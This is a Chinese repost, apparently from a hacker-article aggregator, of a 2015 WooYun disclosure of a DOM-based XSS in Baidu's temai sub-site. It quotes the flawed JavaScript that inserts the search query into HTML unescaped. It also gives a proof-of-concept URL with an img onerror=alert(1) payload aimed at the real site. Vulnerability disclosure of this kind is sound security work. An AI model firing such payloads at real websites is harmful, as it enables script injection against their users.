记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

百度某分站DOM XSS

2015-02-22 06:20

之前有白帽子提交

http://wooyun.org/bugs/wooyun-2010-066884

但未修复完善。



主页:

code 区域
//页面主query

ITUAN.query = "aaaapppp\x3cimg\x3e";



未找到商品时,DOM处理

http://vs-static.baidu.com/temai/asset/v2/asset/index/main.js?v=2014_12_22_13

code 区域
var a = function() {

var e = '<div class="mp-nodata"><span class="no-data-icon"></span><p class="sorry-word">很抱歉,未找到<em>' + ITUAN.query + '</em>相关的品牌特卖信息!</p><p class="suggest-word">您可以搜索其他品牌或查看下面热门品牌特卖</p></div>';

return e

};

漏洞证明:

xss.png





http://temai.baidu.com/Index/Index?wd=wooyun\x3cimg%20src=x%20onerror=alert%281%29\x3e

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-096987

阅读:154632 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某分站DOM XSS”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁